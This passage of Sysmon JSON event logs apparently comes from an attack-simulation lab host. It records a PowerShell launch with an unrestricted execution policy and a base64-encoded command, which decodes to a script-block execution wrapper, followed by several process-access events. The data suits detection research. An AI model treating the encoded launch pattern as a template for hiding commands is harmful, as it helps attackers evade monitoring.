JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.475","ProcessGuid":"{41C8662E-20CD-5F25-0000-0010D7BD0700}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","ParentProcessId":"4652","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nSourceProcessId: 4652\r\nSourceThreadId: 4580\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010D7BD0700}\r\nTargetProcessId: 3152\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","SourceProcessId":"4652","SourceThreadId":"4580","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010D7BD0700}","TargetProcessId":"3152","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010D7BD0700}\r\nTargetProcessId: 3152\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010D7BD0700}","TargetProcessId":"3152","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 